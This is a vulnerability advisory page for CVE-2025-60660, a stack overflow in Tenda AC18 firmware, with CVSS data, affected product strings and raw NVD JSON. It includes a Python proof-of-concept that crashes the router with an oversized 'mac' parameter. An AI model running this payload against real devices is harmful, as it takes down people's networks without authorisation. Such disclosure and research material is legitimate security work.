Security Vulnerability Report
中文
CVE-2025-60660 CVSS 7.5 HIGH

CVE-2025-60660

Published: 2025-10-02 16:15:38
Last Modified: 2025-10-07 17:44:18

Description

Tenda AC18 V15.03.05.19 was discovered to contain a stack overflow via the mac parameter in the fromAdvSetMacMtuWan function.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:tenda:ac18_firmware:15.03.05.19:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:tenda:ac18:-:*:*:*:*:*:*:* - NOT VULNERABLE
Tenda AC18 V15.03.05.19

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 # CVE-2025-60660 - Tenda AC18 Stack Overflow PoC # Vulnerability: Stack buffer overflow via mac parameter in fromAdvSetMacMtuWan function # Affected: Tenda AC18 V15.03.05.19 import requests import sys TARGET = sys.argv[1] if len(sys.argv) > 1 else "http://192.168.0.1" # Overflow payload - excessive length to trigger stack overflow in mac parameter OVERFLOW_SIZE = 2048 payload = "A" * OVERFLOW_SIZE url = f"{TARGET}/goform/AdvSetMacMtuWan" params = { "mac": payload, "mtu": "1500" } try: print(f"[*] Sending exploit to {url}") response = requests.get(url, params=params, timeout=10) print(f"[*] Response status: {response.status_code}") print("[+] Exploit sent - target may crash if vulnerable") except requests.exceptions.RequestException as e: print(f"[-] Request failed (target may have crashed): {e}") print("[+] Target appears to be vulnerable - device crashed")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60660", "sourceIdentifier": "[email protected]", "published": "2025-10-02T16:15:38.380", "lastModified": "2025-10-07T17:44:17.803", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Tenda AC18 V15.03.05.19 was discovered to contain a stack overflow via the mac parameter in the fromAdvSetMacMtuWan function."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-121"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tenda:ac18_firmware:15.03.05.19:*:*:*:*:*:*:*", "matchCriteriaId": "BA3A313A-5085-4ABB-92D0-A26208EE44FB"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:tenda:ac18:-:*:*:*:*:*:*:*", "matchCriteriaId": "CF9F8AF9-F921-4348-922B-EE5E6037E7AC"}]}]}], "references": [{"url": "https://drive.google.com/file/d/1YTKUiYXMsaAEoasx7xbQxy2tsrC5E3Ew/view?usp=sharing", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}